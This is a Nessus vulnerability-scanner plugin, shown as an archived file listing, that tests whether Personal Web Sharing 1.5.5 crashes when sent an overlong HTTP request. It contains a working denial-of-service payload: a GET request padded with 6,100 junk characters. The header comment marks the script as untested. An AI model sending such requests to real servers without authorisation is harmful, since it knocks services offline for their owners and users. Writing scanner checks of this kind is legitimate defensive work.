home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / PWS_DoS.nasl < prev    next >
Text File  |  2005-03-31  |  2KB  |  78 lines

  1. #
  2. # This script was written by Michel Arboi <arboi@alussinan.org>
  3. #
  4. # Script audit and contributions from Carmichael Security <http://www.carmichaelsecurity.com>
  5. #      Erik Anderson <eanders@carmichaelsecurity.com>
  6. #      
  7. #
  8. # GPL
  9. # *untested*
  10. #
  11. # References:
  12. # To: BUGTRAQ@SECURITYFOCUS.COM
  13. # Subject: Personal Web Sharing remote stop
  14. # Date: Thu, 10 May 2001 07:32:43 +0200 (EET)
  15. # Frok: "Jass Seljamaa" <jass@email.isp.ee>
  16. #
  17. # Affected:
  18. # Personal Web sharing v1.5.5
  19.  
  20.  
  21. if(description)
  22. {
  23.  script_id(11085);
  24.  script_bugtraq_id(2715, 84);
  25.  script_version ("$Revision: 1.12 $");
  26.  name["english"] = "Personal Web Sharing overflow ";
  27.  script_name(english:name["english"]);
  28.  
  29.  desc["english"] = "
  30. It was possible to kill the Personal Web Sharing
  31. service by sending it a too long request.
  32.  
  33. A cracker may exploit this vulnerability to make your web server
  34. crash continually.
  35.  
  36. Solution : upgrade your software or protect it with a filtering reverse proxy
  37.  
  38. Risk factor : High";
  39.  
  40.  script_description(english:desc["english"]);
  41.  
  42.  summary["english"] = "Too long request kills PWS";
  43.  script_summary(english:summary["english"]);
  44.  
  45.  script_category(ACT_DENIAL);
  46.  
  47.  script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
  48.  family["english"] = "Denial of Service";
  49.  script_family(english:family["english"]);
  50.  script_require_ports("Services/www", 80);
  51.  script_dependencie("find_service.nes", "httpver.nasl", "http_version.nasl");
  52.  exit(0);
  53. }
  54.  
  55. ########
  56.  
  57. include("http_func.inc");
  58.  
  59.  
  60.  
  61. port = get_http_port(default:80);
  62.  
  63. if(! get_port_state(port)) exit(0);
  64.  
  65. if (http_is_dead(port: port)) exit(0);
  66.  
  67. soc = http_open_socket(port);
  68. if(! soc) exit(0);
  69.  
  70. r= http_get(item:string("/?", crap(6100)), port:port);
  71. send(socket:soc, data: r);
  72. r = http_recv(socket:soc);
  73. close(soc);
  74.  
  75.  
  76. if(http_is_dead(port: port)) { security_hole(port); }
  77.